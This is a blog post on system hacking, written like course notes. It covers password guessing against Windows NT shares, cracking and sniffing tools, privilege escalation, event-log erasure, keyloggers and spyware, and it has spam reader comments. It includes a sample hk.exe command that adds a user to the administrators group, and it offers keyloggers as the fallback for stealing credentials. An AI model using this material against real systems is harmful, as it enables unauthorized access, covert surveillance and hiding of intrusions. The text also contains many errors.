Password Cracking,Escalating Privileges and Hiding Files

There are various aspects of system hacking. As we recall from Footprinting, "Gathering Networt and Host Information: Scanning and Enumeration" the system hacking cycle consists of six steps. The first step—enumeration—was discussed in the previous topic. The TechTrick covers the five remaining steps:

  • Cracking passwords
  • Escalating privileges
  • Executing applications
  • Hiding files
  • Covering tracks

The Simplest Way to Get a Password

Many hacking attempts start with getting a password to a target system. Passwords are the key piece of information needed to access a system and users often select passwords that are easy to guess.Many reuse passwords or choose one thats simple—such as a pets name to help them remember it. Because of this human factor, most password guessing is successful if some information is known about the target. Information gathering and reconnaissance can help give away information that will help a hacker guess a users password.

Once a password is guessed or cracked, it can be the launching point for escalating privileges, executing applications, hiding files, and covering tracks . If guessing a password fails,then passwords may be cracked manually or with automated tools such as a dictionary or brute-force method

Types of Passwords

Several types of passwords are used to provide access to systems. The characters that form a password can fall into any of these categories:

  • Passwords that contain only letters.
  • Passwords that contain only numbers.
  • Passwords that contain only special characters.
  • Passwords that contain letters and numbers.
  • Passwords that contain only letters and special characters.
  • Passwords that contain only special characters and numbers.
  • Passwords that contain letters, special characters and numbers.

Administrator Password Guessing

  • Assuming that NetBIOS TCP139 port is open, the most effective method of breaking into NT/2000 is password guessing.
  • Attempting to connect to an enumerated share (IPC$ or C$) and trying username/password.
  • Default Admin$, C$, %Systemdrive% shares are good starting point.

Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?

System Hacking:Password Cracking,Escalating Privileges,and Hiding Files

Cracking a Password

Manual password cracking involves attempting to log on with different passwords.The hacker follows these steps :-

  • Find a valid user account (such as Administrator or Guest).
  • Create a list of possible passwords.
  • Rank the passwords from high to low probability.
  • Key in each password.
  • Try again until a successful password is found.

A hacker can also create a script file that tries each password in a list. This is still considered manual cracking but its time consuming and not usually effective.

Hacking Tool: LOphtcrack

L0phtCrack is a password auditing and recovery package distributed by @@stake software, which is now owned by Symantec. It performs Server Message Block (SMB) packet captures on the local network segment and captures individual login sessions. L0phtCrack contains dictionary, brute-force, and hybrid attack capabilities. Symantec has recently stopped development of the L0phtCrack tool but it can still be found on the Internet.

With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days.

Download LOphtcrack

Hacking Tool: KerbCrack

KerbCrack consists of two programs, kerbsniff and kerbcrack.The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.

System Hacking:Password Cracking,Escalating Privileges,and Hiding Files

Download KerbCrack

Hacking Tools : Legion

Legion automates the password guessing in NetBIOS sessions. Legion scans multiple IP address ranges for Windows shares and also offers a manual dictionary attack tool.

Hacking Tools : NTInfoScan

NTInfoScan is a security scanner for NT 4.0. This vulnerability scanner produces an HTML-based report of security issues found on the target system and other information.

Hacking Tools : LC5

LC5 is another good password cracking tool. LC5 is a suitable replacement for L0phtCrack.

Hacking Tools : Privilege Escalation

If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.

This is called privilege escalation.

Download Privilege Escalation

Hacking Tool: GetAdmin

1. GetAdmin.exe is a small program that adds a user to the local administrators group.

2. It uses low-level NT kernel routine to set a globalflag allowing access to any running process.

3. You need to logon to the server console to execute the program.

4. The GetAdmin.exe is run from the command line or from a browser.

5. This only works with Nt 4.0 Service pack 3.

Hacking Tool: hk.exe

1. The hk.exe utility exposes a Local Procedure Call flaw in NT.

2. A non-admin user can be escalated to administrators group using hk.exe

c:\>net localgroup administrators akash /add access denied
c:\>hk net localgroup administrators akash /add access pid & tid are:47 -48

NtImpersonateClientOfPort succeeded

Types of Password Attacks

  • Dictionary attack
  • Brute force attack
  • Hybrid attack
  • Social engineering
  • Shoulder surfing
  • Dumpster diving

Hacking Tool: SMB Grind

SMBGrind increases the speed of LOphtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.

Download SMB Grind

Hacking Tool: SMBDie

SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially crafted SMB request.

Hacking Tool: NBTDeputy

NBTDeputy register a NetBIOS computer name on the networkand is ready to respond to NetBT name-query requests.

NBTdeputy helps to resolve IP address from NetBIOS computer name. Its similar to Proxy ARP.

This tool works well with SMBRelay.

For example, SMBRelay runs on a computer as ANONYMOUS-ONE and the IP address is and NBTDeputy is also ran and is specified. SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places".

Hacking Tool: John the Ripper

It is a command line tool designed to crack both Unix and NT passwords.John is extremely fast and free

The resulting passwords are case insensitive and may not represent the real mixed-case password.

Download John the Ripper

Hacking Tool: Win32CreateLocalAdminUser

Win32CreateLocalAdminUser is a program that creates a new user with the username and password X and adds the user to the local administrators group.This action is part of the Metasploit Project and can be launched with the Metasploit framework on Windows.

Hacking Tool: Offline NT Password Resetter

Offline NT Password Resetter is a method of resetting the password to the administrators account when the system is not booted to Windows. The most common method is to boot to a Linux boot CD and then access the NTFS partition which is no longer protected, and change the password.

Download Offline NT Password Resetter

Download and install ophcrack from

Hacking Tool : Keystroke Loggers

1. If all other attempts to sniff out domain privileges fail, then keystroke logger is the solution.

2. Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

3. There are two types of keystroke loggers :-

• 1. Software based and

• 2. Hardware based

Hacking Tool: WinZapper

1. Wizapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000.

2. To use the program, the attacker runs winzapper.exe and marks the event records to be deleted then he presses delete events.

3. To sum things up: after an attacker has gained Administrators access to the system one simply cannot trust the security log!

Hacking Tool: Hardware Key Logger(

1. The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

2. It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

Spy ware: Spector

1. Spector is a spy ware and it will record everything anyone does on the internet.

2. Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector you will be able to see exactly what your surveillance targets have been doing online and offline.

3. Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computers hard drive.

I hope you enjoyed this article.

Sharing is caring


About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email (

You may also like :-

Leave a Comment

Your email address will not be published. Required fields are marked *

Reader Comments [9]


of course like your website but you need
to take a look at the spelling on several
of your posts. Many of them are rife with spelling problems
and I find it very troublesome to inform the truth on the other hand
I will surely come back again.




I am really loving these articles as they help me gain more and more information . But could you post something bout the best hacking sites on deep web which might help a person who has a strong base and is willing to learn.




Hello i am k?vin, its my fi?st occ?sion to commenting any?l?ce, when i read th?s article i thought i
could als? ?reate comment due to this brilliant article.




Simply desire to say your article is as astounding.

The clarity in your post is just nice and i can assume you are an expert
on this subject. Well with your permission allow me to grab
your RSS feed to keep updated with forthcoming post.
Thanks a million and please continue the enjoyable work.




This is a topic that's close to my heart...
Cheers! Where are your contact details though?




Wow! This bl?g lo?ks exactly like my old one! It's on a entirely different
topic but it has pretty much the same page layout and design. O?tstanding choice of



off white clothing

I together with my buddies have been reading the excellent points from the blog while unexpectedly came up with an awful suspicion I never thanked the site owner for those techniques. These people were definitely for this reason very interested to read all of them and now have in actuality been using these things. I appreciate you for turning out to be considerably helpful and then for having variety of magnificent useful guides most people are really eager to be aware of. My personal sincere regret for not expressing gratitude to you sooner.



christian louboutin

I needed to write you a very small word just to say thanks a lot as before with your stunning thoughts you have shown in this article. It is certainly remarkably generous of people like you to give freely what exactly most people could possibly have distributed for an electronic book to earn some profit for themselves, specifically seeing that you could have done it if you ever desired. Those strategies also acted to become great way to know that some people have the same keenness the same as my own to figure out lots more in regard to this matter. Certainly there are several more enjoyable periods in the future for individuals that go through your site.




If you are going for best contents like I do, only pay a visit this web site
all the time as it offers feature contents, thanks



Stay Connected

Popular Posts

Get Latest Stuff Through Email

Who Should Read TechTrick?

All the tricks and tips that TechTrick provides only for educational purpose. If you choose to use the information in TechTrick to break into computer systems maliciously and without authorization, you are on your own. Neither I (TechTrick Admin) nor anyone else associated with TechTrick shall be liable. We are not responsibe for any issues that caused due to informations provided here. So, Try yourself and see the results. You are not losing anything by trying... We are humans, Mistakes are quite natural. Here on TechTrick also have many mistakes..